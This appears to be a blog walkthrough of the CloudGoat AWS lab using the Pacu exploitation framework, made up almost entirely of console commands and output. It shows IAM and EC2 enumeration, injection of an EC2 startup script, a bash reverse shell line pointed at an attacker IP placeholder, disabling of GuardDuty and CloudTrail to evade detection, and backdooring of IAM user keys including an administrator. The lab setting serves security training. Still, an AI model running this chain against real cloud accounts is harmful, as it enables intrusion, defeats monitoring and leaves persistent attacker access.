Playing with CloudGoat part 5: hacking AWS with Pacu

“Pacu is an open source AWS exploitation framework, designed for offensive security testing against cloud environments. Created and maintained by Rhino Security Labs, Pacu allows penetration testers to exploit configuration flaws within an AWS account, using modules to easily expand its functionality. Current modules enable a range of attacks, including user privilege escalation, backdooring of IAM users, attacking vulnerable Lambda functions, and much more.”

> run iam__enum_permissions
Running module iam__enum_permissions...
[iam__enum_permissions] Confirming permissions for users:
[iam__enum_permissions] bob...
[iam__enum_permissions] Confirmed Permissions for bob
[iam__enum_permissions] iam__enum_permissions completed.
[iam__enum_permissions] MODULE SUMMARY:Confirmed permissions for user: bob.
Confirmed permissions for 0 role(s).
> run ec2__enum
Running module ec2__enum...
[ec2__enum] Starting region us-west-2...
[ec2__enum] 2 instance(s) found.
[ec2__enum] 15 security groups(s) found.
[ec2__enum] FAILURE:
[ec2__enum] Access denied to DescribeAddresses.
[ec2__enum] Skipping elastic IP enumeration...
[ec2__enum] 0 elastic IP address(es) found.
[ec2__enum] FAILURE:
[ec2__enum] Access denied to DescribeCustomerGateways.
[ec2__enum] Skipping VPN customer gateway enumeration...
[ec2__enum] 0 VPN customer gateway(s) found.
[intentionally removed output]
[ec2__enum] MODULE SUMMARY:
Regions:
us-west-2
2 total instance(s) found.
15 total security group(s) found.
4 total subnets(s) found.
1 total VPC(s) found.
Pacu (Hack_the_CloudGoat:Bob) > services
EC2
Pacu (Hack_the_CloudGoat:Bob) > data EC2
{
"Instances": [
{
"AmiLaunchIndex": 0,
"Architecture": "x86_64",
"BlockDeviceMappings": [
{
"DeviceName": "/dev/xvda",
"Ebs": {
"AttachTime": "Tue, 26 Feb 2019 19:56:48",
"DeleteOnTermination": true,
"Status": "attached",
"VolumeId": "vol-065d9d7aad68e0177"
}
}
],
(...)
> run ec2__startup_shell_script --script my_user_data.sh --instance-ids i-041f94160e4f1e316@us-west-2
Running module ec2__startup_shell_script...
[ec2__startup_shell_script] Stopping i-041f94160e4f1e316
[ec2__startup_shell_script] Setting User Data for i-041f94160e4f1e316
[ec2__startup_shell_script] Starting i-041f94160e4f1e316
[ec2__startup_shell_script] ec2__startup_shell_script completed.
[ec2__startup_shell_script] MODULE SUMMARY:1 Instance(s) Modified
bash -i >& /dev/tcp/[my_ip]/[my_port] 0>&1

In theory it should be even easier and you should be able to start a local listener in Pacu using the command proxy start [local ip] [local port] which should allow you to manage this shell from Pacu’ console as well as pivot commands through the newly compromised machine. Yes “in theory”, because at the moment of writing this post something didn’t work as it should and I was unable to use it. But for sure it’ll be soon fixed so stay aware of this great feature!

> data CloudTrail
{
"Trails": [
{
"HasCustomEventSelectors": false,
"HomeRegion": "us-west-2",
"IncludeGlobalServiceEvents": true,
"IsMultiRegionTrail": false,
"LogFileValidationEnabled": true,
"Name": "cloudgoat_trail",
"Region": "us-west-2",
"S3BucketName": "16242183631729158332334886424132196042474324643131628372",
"S3KeyPrefix": "cloudtrail",
"TrailARN": "arn:aws:cloudtrail:us-west-2:XXXXXXXXXXXX:trail/cloudgoat_trail"
}
]
> run detection__disruption --trails cloudgoat_trail@us-west-2 --detectors 7ab496d17a483855b592b38e15689568@us-west-2
Running module detection__disruption...
[detection__disruption] Starting GuardDuty...
[detection__disruption] Starting region us-west-2...
[detection__disruption] GuardDuty detector ID: 7ab496d17a483855b592b38e15689568
Do you want to disable (dis), delete (del), or skip (s) it? (dis/del/s) dis
[detection__disruption] Successfully disabled detector 7ab496d17a483855b592b38e15689568!
[detection__disruption] GuardDuty finished.
[detection__disruption] Starting CloudTrail...
[detection__disruption] Starting region us-west-2...
[detection__disruption] CloudTrail trail name: cloudgoat_trail
Do you want to disable (dis), delete (del), minimize (m), or skip (s) it? (dis/del/m/s) dis
[detection__disruption] Successfully disabled trail cloudgoat_trail!
[detection__disruption] CloudTrail finished.
[detection__disruption] No rules found. Skipping Config rules...
[detection__disruption] No recorders found. Skipping Config recorders...
[detection__disruption] No aggregators found. Skipping Config aggregators...
[detection__disruption] No alarms found. Skipping CloudWatch...
[detection__disruption] No flow logs found. Skipping VPC...
[detection__disruption] detection__disruption completed.
[detection__disruption] MODULE SUMMARY:
GuardDuty:
1 detector(s) disabled.
0 detector(s) deleted.
CloudTrail:
1 trail(s) disabled.
0 trail(s) deleted.
0 trail(s) minimized.
> run iam__backdoor_users_keys --usernames bob,joe,administrator
Running module iam__backdoor_users_keys...
[iam__backdoor_users_keys] Backdoor the following users?
[iam__backdoor_users_keys] bob
[iam__backdoor_users_keys] Access Key ID: XXX
[iam__backdoor_users_keys] Secret Key: XXX
[iam__backdoor_users_keys] joe
[iam__backdoor_users_keys] Access Key ID: XXX
[iam__backdoor_users_keys] Secret Key: XXX
[iam__backdoor_users_keys] administrator
[iam__backdoor_users_keys] Access Key ID: XXX
[iam__backdoor_users_keys] Secret Key: XXX
[iam__backdoor_users_keys] iam__backdoor_users_keys completed.
[iam__backdoor_users_keys] MODULE SUMMARY:
3 user key(s) successfully backdoored.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store